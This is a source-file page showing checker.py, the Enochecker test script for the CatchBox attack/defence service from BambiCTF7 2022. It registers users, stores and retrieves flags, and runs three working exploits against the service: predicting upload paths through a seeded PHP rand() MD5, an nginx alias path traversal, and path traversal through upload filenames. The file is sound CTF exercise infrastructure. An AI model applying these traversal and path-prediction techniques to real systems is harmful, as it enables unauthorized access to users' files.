bambi7-service-catchbox

Simple Web-based file storage A/D service for BambiCTF7 in 2022
git clone https://git.sinitax.com/sinitax/bambi7-service-catchbox
Log | Files | Refs | README | sfeed.txt

checker.py (9604B)


      1from bs4 import BeautifulSoup
      2
      3from enochecker3 import (
      4    ChainDB,
      5    DependencyInjector,
      6    Enochecker,
      7    ExploitCheckerTaskMessage,
      8    GetflagCheckerTaskMessage,
      9    GetnoiseCheckerTaskMessage,
     10    InternalErrorException,
     11    MumbleException,
     12    PutflagCheckerTaskMessage,
     13    PutnoiseCheckerTaskMessage,
     14)
     15from enochecker3.utils import FlagSearcher, assert_in, assert_equals
     16
     17import dateutil.parser
     18
     19from httpx import AsyncClient, Response
     20
     21from hashlib import md5
     22
     23from logging import LoggerAdapter
     24
     25from subprocess import Popen, PIPE
     26
     27import string
     28
     29from typing import Any, Optional
     30
     31import random
     32
     33import os
     34
     35checker = Enochecker("CatchBox", 9090)
     36app = lambda: checker.app
     37
     38random.seed(int.from_bytes(os.urandom(16), "little"))
     39
     40noise_alph = string.ascii_letters + string.digits
     41def noise(nmin: int, nmax: int) -> str:
     42    n = random.randint(nmin, nmax)
     43    return "".join(random.choice(noise_alph) for _ in range(n))
     44
     45def filehash(user: str, file: str, seed: int) -> str:
     46    code = f"<?php srand({seed}); echo md5('{user}'.'{file}'.strval(rand())); ?>"
     47    with Popen("php", stdin=PIPE, stdout=PIPE) as php:
     48        return php.communicate(code.encode())[0].strip().decode()
     49
     50def str2epoch(text: str) -> int:
     51    date = dateutil.parser.parse(text + " UTC")
     52    return int(date.timestamp())
     53
     54def parse_html(logger: LoggerAdapter, r: Response) -> BeautifulSoup:
     55    try:
     56        return BeautifulSoup(r.text, "html.parser")
     57    except:
     58        logger.error(f"Invalid html from {r.request.method} {r.request.url.path}\n" \
     59            + r.text)
     60        raise MumbleException(f"Invalid html ({r.request.method} {r.request.url.path})")
     61
     62def assert_status_code(logger: LoggerAdapter, r: Response,
     63        code: int, errmsg: Optional[str], extra: Any = "") -> None:
     64    if r.status_code != code:
     65        logger.error(f"Bad service response for " \
     66            + f"{r.request.method} {r.request.url.path}:\n" \
     67            + f"Extra info: {str(extra)}\n{r.text}")
     68        if errmsg is None:
     69            errmsg = f"{r.request.method} {r.request.url.path} failed"
     70        raise MumbleException(errmsg)
     71
     72@checker.putflag(0)
     73async def putflag_file(task: PutflagCheckerTaskMessage, logger: LoggerAdapter,
     74        client: AsyncClient, db: ChainDB) -> str:
     75    username, password = noise(10, 20), noise(20, 30)
     76    data = { "action": "register", "username": username, "password": password }
     77    r = await client.post("/index.php", data=data)
     78    assert_status_code(logger, r, 200, "Register failed", extra=data)
     79
     80    filename, content = noise(20, 30), task.flag
     81    data = { "action": "upload", "filename": filename, "content": content }
     82    r = await client.post("/index.php", data=data)
     83    assert_status_code(logger, r, 200, "File upload", extra=data)
     84
     85    await db.set("info", (username, password, filename))
     86
     87    return f"User {username} File {filename}"
     88
     89@checker.getflag(0)
     90async def getflag_file(task: GetflagCheckerTaskMessage,
     91        logger: LoggerAdapter, client: AsyncClient, db: ChainDB) -> None:
     92    try:
     93        username, password, filename = await db.get("info")
     94    except KeyError:
     95        raise MumbleException("database info missing")
     96
     97    data = { "action": "login", "username": username, "password": password }
     98    r = await client.post("/index.php", data=data)
     99    assert_status_code(logger, r, 200, "Login failed", extra=data)
    100
    101    r = await client.get(f"/index.php?f={filename}")
    102    assert_status_code(logger, r, 200, "File download failed", extra=filename)
    103
    104    assert_in(task.flag, r.text, "Flag missing")
    105
    106@checker.putflag(1)
    107async def putflag_report(task: PutflagCheckerTaskMessage,
    108        logger: LoggerAdapter, client: AsyncClient, db: ChainDB) -> str:
    109    username, password = noise(10, 20), noise(20, 30)
    110    data = { "action": "register", "username": username, "password": password }
    111    r = await client.post("/index.php", data=data)
    112    assert_status_code(logger, r, 200, "Register failed", extra=data)
    113
    114    data = { "action": "report", "content": task.flag }
    115    r = await client.post("/index.php", data=data)
    116    assert_status_code(logger, r, 200, "Upload failed", extra=data)
    117
    118    await db.set("info", (username, password))
    119
    120    return f"User {username} Report"
    121
    122@checker.getflag(1)
    123async def getflag_report(task: GetflagCheckerTaskMessage,
    124        logger: LoggerAdapter, client: AsyncClient, db: ChainDB) -> None:
    125    try:
    126        username, password = await db.get("info")
    127    except KeyError:
    128        raise MumbleException("Database info missing")
    129
    130    data = { "action": "login", "username": username, "password": password }
    131    r = await client.post("/index.php", data=data)
    132    assert_status_code(logger, r, 200, "Login failed", extra=data)
    133
    134    r = await client.get(f"/index.php?r")
    135    assert_status_code(logger, r, 200, "Report download failed")
    136
    137    assert_in(task.flag, r.text, "Flag missing")
    138
    139@checker.putnoise(0)
    140async def putnoise_file(task: PutnoiseCheckerTaskMessage,
    141        logger: LoggerAdapter, client: AsyncClient, db: ChainDB) -> None:
    142    username, password = noise(10, 20), noise(20, 30)
    143    data = { "action": "register", "username": username, "password": password }
    144    r = await client.post("/index.php", data=data)
    145    assert_status_code(logger, r, 200, "Register failed", extra=data)
    146
    147    filename, content = noise(20, 30), noise(20, 30)
    148    data = { "action": "upload", "filename": filename, "content": content }
    149    r = await client.post("/index.php", data=data)
    150    assert_status_code(logger, r, 200, "File upload failed", extra=data)
    151
    152    await db.set("info", (username, password, filename, content))
    153
    154@checker.getnoise(0)
    155async def getnoise_file(task: GetnoiseCheckerTaskMessage,
    156        logger: LoggerAdapter, client: AsyncClient,
    157        db: ChainDB, di: DependencyInjector) -> None:
    158    try:
    159        username, password, filename, noise = await db.get("info")
    160    except KeyError:
    161        raise MumbleException("database info missing")
    162
    163    data = { "action": "login", "username": username, "password": password }
    164    r = await client.post("/index.php", data=data)
    165    assert_status_code(logger, r, 200, "Login failed", extra=data)
    166
    167    r = await client.get("/index.php?q=files")
    168    assert_status_code(logger, r, 200, "Files query failed")
    169
    170    soup = parse_html(logger, r)
    171    files = [v.select("a") for v in soup.select("ul.filelist > li")]
    172    assert_equals(all([len(v) == 2 for v in files]), True, "noise missing")
    173
    174    urls = { a.text.strip(): b.get("href", None) for a,b in files }
    175    assert_in(filename, urls, "Noise missing")
    176    assert_equals(type(urls[filename]), str, "noise missing")
    177
    178    r = await client.get(f"/index.php?f={filename}")
    179    assert_status_code(logger, r, 200, "File download failed", extra=filename)
    180    assert_in(noise, r.text, "Noise missing")
    181
    182    anon = await di.get(AsyncClient)
    183    r = await anon.get(urls[filename])
    184    assert_status_code(logger, r, 200, "Public url invalid",
    185        extra={"filename": filename, "url": urls[filename]})
    186    assert_in(noise, r.text, "Noise missing")
    187
    188@checker.exploit(0)
    189async def exploit_file_creat(task: ExploitCheckerTaskMessage,
    190        logger: LoggerAdapter, searcher: FlagSearcher,
    191        client: AsyncClient) -> Optional[str]:
    192    assert_equals(type(task.attack_info), str, "attack info missing")
    193
    194    assert_equals(len(task.attack_info.split()), 4)
    195    _, flaguser, _, flagfile = task.attack_info.split()
    196
    197    r = await client.get("/?q=users")
    198    assert_status_code(logger, r, 200, "Users listing failed")
    199
    200    soup = parse_html(logger, r)
    201    users = [v.children for v in soup.select("ul.userlist > li")]
    202    times = { a.text.strip(): str2epoch(b.text.strip()) for a,b in users }
    203
    204    assert_in(flaguser, times, "Flag user missing")
    205    for creat in range(times[flaguser], times[flaguser] + 15):
    206        dirname = filehash(flaguser, flagfile, creat)
    207        r = await client.get(f"/uploads/{dirname}/{flagfile}")
    208        if flag := searcher.search_flag(r.text):
    209            return flag
    210
    211@checker.exploit(1)
    212async def exploit_report_nginx(task: ExploitCheckerTaskMessage,
    213        logger: LoggerAdapter, searcher: FlagSearcher,
    214        client: AsyncClient) -> Optional[str]:
    215    assert_equals(type(task.attack_info), str, "attack info missing")
    216    assert_equals(len(task.attack_info.split()), 3, "attack info invalid")
    217
    218    _, flaguser, _ = task.attack_info.split()
    219    reportfile = md5(flaguser.encode()).hexdigest()
    220
    221    r = await client.get(f"/uploads../reports/{reportfile}")
    222    if flag := searcher.search_flag(r.text):
    223        return flag
    224
    225@checker.exploit(2)
    226async def exploit_report_path(task: ExploitCheckerTaskMessage,
    227        logger: LoggerAdapter, searcher: FlagSearcher,
    228        client: AsyncClient) -> Optional[str]:
    229    assert_equals(type(task.attack_info), str, "attack info missing")
    230    assert_equals(len(task.attack_info.split()), 3, "attack info invalid")
    231
    232    _, flaguser, _ = task.attack_info.split()
    233    reportfile = md5(flaguser.encode()).hexdigest()
    234
    235    username, password = noise(10, 20), noise(20, 30)
    236    data = { "action": "register", "username": username, "password": password }
    237    r = await client.post("/index.php", data=data)
    238    assert_status_code(logger, r, 200, "Register failed", extra=data)
    239
    240    filepath = f"../../reports/{reportfile}"
    241    data = { "action": "upload", "filename": filepath, "content": "exploit2!" }
    242    r = await client.post("/index.php", data=data)
    243    assert_status_code(logger, r, 200, "Path traversal", extra=data)
    244
    245    r = await client.get(f"/index.php?f={filepath}")
    246    if flag := searcher.search_flag(r.text):
    247        return flag
    248
    249if __name__ == "__main__":
    250    checker.run()
    251